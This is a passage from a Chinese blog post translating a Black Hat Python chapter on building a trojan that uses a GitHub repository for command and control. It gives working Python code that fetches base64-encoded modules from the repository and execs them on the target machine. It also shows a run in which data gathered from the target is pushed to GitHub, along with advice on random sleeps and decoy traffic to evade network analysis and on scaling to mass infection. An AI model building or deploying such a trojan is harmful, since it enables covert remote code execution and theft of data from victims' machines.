<p><em>get_config</em> 类函数[1]从存储库中检索远程配置文档，以便您的特洛伊木马知道要运行哪些模块。 <em>exec</em> 调用将模块内容引入特洛伊木马对象[2]。<em>module_runner</em> 类函数调用刚刚导入的模块的 <em>run</em> 函数[3]。在下一节中，我们将更详细地讨论如何调用它。<em>store_module_result</em> 函数[4]创建一个名称包含当前日期和时间的文件，然后将其输出保存到该文件中。该木马会使用这三个类函数将从目标机器收集的所有数据推送到 GitHub 。</p>
<p>在 <em>run</em> 函数[5]中，我们开始执行这些任务。第一步是从存储库中获取配置文件。然后我们在它自己的线程中启动模块。在 <em>module_runner</em> 类函数中，我们调用模块的 <em>run</em> 函数来运行它的代码。当它完成运行时，它应该输出一个字符串，然后我们将它传递到我们的存储库。</p>
<p>当它完成一项任务时，特洛伊木马将休眠一段随机长的时间，尝试躲避网络分析[6]。当然，你可以创建一大堆到 google.com 的流量，或者任何数量的其他看似良性的站点的流量，尝试掩盖你的木马程序的真实目的。</p>
<p>现在让我们创建一个导入 hack 来从 GitHub 存储库导入远程文件。</p>
<h2 id="导入Python的黑客攻击功能"><a href="#导入Python的黑客攻击功能" class="headerlink" title="导入Python的黑客攻击功能"></a>导入Python的黑客攻击功能</h2><p>如果你已经在本书中学习了这么久，你应该知道我们使用 Python 的 import 功能将外部库复制到我们的程序中，这样我们就可以使用它们的代码。我们希望能够我们的特洛伊木马可以做同样的事情。但是，由于我们控制的是远程机器，我们可能希望在该机器上使用没有安装的软件包，并且没有简单的方法来远程安装软件包。除此之外，我们还希望确保如果我们引入一个依赖项，比如 Scapy ，我们的特洛伊木马程序会让我们引入的所有其他模块都可以使用该模块。</p>
<p>Python 允许我们自定义它导入模块的方式；如果它在本地找不到模块，它将调用我们定义的导入类，这将允许我们从存储库中远程检索库。我们必须将自定义的类添加到 <em>sys.meta_path</em> 列表中。现在，让我们通过添加以下代码来创建这个类:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">GitImporter</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></span><br><span class="line">        self.current_module_code = <span class="string">""</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">find_module</span><span class="params">(self, name, path=None)</span>:</span></span><br><span class="line">        print(<span class="string">"[*] Attempting to retrieve %s"</span> % name)</span><br><span class="line">        self.repo = github_connect()</span><br><span class="line">        new_library = get_file_contents(<span class="string">'modules'</span>, <span class="string">f'<span class="subst">&#123;name&#125;</span>.py'</span>, self.repo)</span><br><span class="line">        <span class="keyword">if</span> new_library <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span>:</span><br><span class="line">        [<span class="number">1</span>] self.current_module_code = base64.b64decode(new_library)</span><br><span class="line">            <span class="keyword">return</span> self</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">load_module</span><span class="params">(self, name)</span>:</span></span><br><span class="line">        spec = importlib.util.spec_from_loader(name, loader=<span class="literal">None</span>,</span><br><span class="line">                                                origin=self.repo.git_url)</span><br><span class="line">    [<span class="number">2</span>] new_module = importlib.util.module_from_spec(spec)</span><br><span class="line">        exec(self.current_module_code, new_module.__dict__)</span><br><span class="line">    [<span class="number">3</span>] sys.modules[spec.name] = new_module</span><br><span class="line">        <span class="keyword">return</span> new_module</span><br></pre></td></tr></table></figure>

<p>每次解释器尝试加载一个不可用的模块时，它都会使用这个 <em>GitImporter</em> 类。首先， <em>find_module</em> 类函数尝试定位模块。我们将这个调用传递给我们的远程文件加载器。如果我们能在我们的存储库中找到这个文件，我们就对代码进行 base64 解码，并将其存储在我们的类中[1]。( GitHub 会传递给我们 base64 编码后的数据。)通过返回 self ，我们向 Python 解释器表明我们找到了模块，并且它可以调用 <em>load_module</em> 函数来实际地加载它。我们使用原生的 importlib 模块首先创建一个新的空白模块对象[2]，然后将我们从 GitHub 检索到的代码塞入其中。最后一步是将新创建的模块插入到 <em>sys.modules</em> 列表中[3]，以便将来任何的 import 调用都可以获取它。</p>
<p>现在让我们对特洛伊木马做最后的修缮:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    sys.meta_path.append(GitImporter())</span><br><span class="line">    trojan = Trojan(<span class="string">'abc'</span>)</span><br><span class="line">    trojan.run()</span><br></pre></td></tr></table></figure>

<p>在 __main__ 块中，我们将 <em>GitImporter</em> 放入 <em>sys.meta_path</em> 列表，创建 <em>Trojan</em> 对象，并调用它的 <em>run</em> 函数。</p>
<p>现在让我们试一下吧！</p>
<h3 id="Kicking-the-Tires"><a href="#Kicking-the-Tires" class="headerlink" title="Kicking the Tires"></a>Kicking the Tires</h3><p>很好，让我们通过从命令行运行它来测试一下:</p>
<p>WARNING：如果您在文件或环境变量中有敏感信息，请记住，如果没有私有的存储库，这些信息将被上传到 GitHub 分享给全世界浏览。别说我们没警告过你。当然，您可以使用将在第9章中学习的加密技术来保护自己。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ python git_trojan.py</span><br><span class="line">[*] Attempting to retrieve dirlister</span><br><span class="line">[*] Attempting to retrieve environment</span><br><span class="line">[*] In dirlister module</span><br><span class="line">[*] In environment module.</span><br></pre></td></tr></table></figure>

<p>非常好。它连接到存储库，检索配置文件，引入我们在配置文件中设置的两个模块，并运行它们。</p>
<p>现在，从您的特洛伊木马所在目录，在命令行中输入以下内容:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$ git pull origin master</span><br><span class="line">From https://github.com/tiarno/bhptrojan</span><br><span class="line">   6256823..8024199  master     -&gt; origin/master</span><br><span class="line">Updating 6256823..8024199</span><br><span class="line">Fast-forward</span><br><span class="line"> data/abc/2020-03-29T11:29:19.475325.data | 1 +</span><br><span class="line"> data/abc/2020-03-29T11:29:24.479408.data | 1 +</span><br><span class="line"> data/abc/2020-03-29T11:40:27.694291.data | 1 +</span><br><span class="line"> data/abc/2020-03-29T11:40:33.696249.data | 1 +</span><br><span class="line"> 4 files changed, 4 insertions(+)</span><br><span class="line"> create mode 100644 data/abc/2020-03-29T11:29:19.475325.data</span><br><span class="line"> create mode 100644 data/abc/2020-03-29T11:29:24.479408.data</span><br><span class="line"> create mode 100644 data/abc/2020-03-29T11:40:27.694291.data</span><br><span class="line"> create mode 100644 data/abc/2020-03-29T11:40:33.696249.data</span><br></pre></td></tr></table></figure>

<p>太棒了。木马检查了两个运行模块的结果。</p>
<p>您可以对这种核心的命令和控制技术进行许多改进和增强。比如加密所有模块、配置和已过滤的数据会是一个良好的开始。如果要大规模感染系统，您还需要自动执行删除数据、更新配置文件和推出新木马的处理功能。随着您添加越来越多的功能，您还需要扩展 Python 加载动态和编译库的方式。</p>
<p>现在，让我们创建一些独立的特洛伊木马任务，我们将把它们集成到您的新 GitHub 特洛伊木马中。</p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Ma9icCR</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://ma9iccr.github.io/2021-07/Black-Hat-Python-2nd-7/">https://ma9iccr.github.io/2021-07/Black-Hat-Python-2nd-7/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://ma9iccr.github.io" target="_blank">Ma9icCR</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Black-Hat-Python-2nd/">Black_Hat_Python_2nd</a></div><div class="post_share"><div class="social-share" data-image="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/OIP-C.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"/><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2021-07/Black-Hat-Python-2nd-8/"><img class="prev-cover" data-src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Black Hat Python 2nd 8</div></div></a></div><div class="next-post pull-right"><a href="/2021-07/Black-Hat-Python-2nd-6/"><img class="next-cover" data-src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Black Hat Python 2nd 6</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fas fa-thumbs-up fa-fw"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2021-07/Black-Hat-Python-2nd-11/" title="Black Hat Python 2nd 11"><img class="relatedPosts_cover" data-src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-23</div><div class="relatedPosts_title">Black Hat Python 2nd 11</div></div></a></div><div class="relatedPosts_item"><a href="/2021-07/Black-Hat-Python-2nd-10/" title="Black Hat Python 2nd 10"><img class="relatedPosts_cover" data-src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-20</div><div class="relatedPosts_title">Black Hat Python 2nd 10</div></div></a></div><div class="relatedPosts_item"><a href="/2021-07/Black-Hat-Python-2nd-9/" title="Black Hat Python 2nd 9"><img class="relatedPosts_cover" data-src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-18</div><div class="relatedPosts_title">Black Hat Python 2nd 9</div></div></a></div><div class="relatedPosts_item"><a href="/2021-07/Black-Hat-Python-2nd-8/" title="Black Hat Python 2nd 8"><img class="relatedPosts_cover" data-src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-13</div><div class="relatedPosts_title">Black Hat Python 2nd 8</div></div></a></div><div class="relatedPosts_item"><a href="/2021-07/Black-Hat-Python-2nd-6/" title="Black Hat Python 2nd 6"><img class="relatedPosts_cover" data-src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-03</div><div class="relatedPosts_title">Black Hat Python 2nd 6</div></div></a></div><div class="relatedPosts_item"><a href="/2021-06/Black-Hat-Python-2nd-5/" title="Black Hat Python 2nd 5"><img class="relatedPosts_cover" data-src="https://ma9ic-image.obs.cn-north-4.myhuaweicloud.com/images/BHP2nd.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="far fa-calendar-alt fa-fw"></i> 2021-06-28</div><div class="relatedPosts_title">Black Hat Python 2nd 5</div></div></a></div></div></div></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By Ma9icCR</div><div class="framework-info"><span>驱动 </span><a href="https://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="font_plus" type="button" title="放大字体"><i class="fas fa-plus"></i></button><button id="font_minus" type="button" title="缩小字体"><i class="fas fa-minus"></i></button><button id="translateLink" type="button" title="简繁转换">简</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script id="ribbon_piao" mobile="false" src="/js/third-party/piao.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module" defer></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload/dist/lazyload.iife.min.js" async></script></body></html>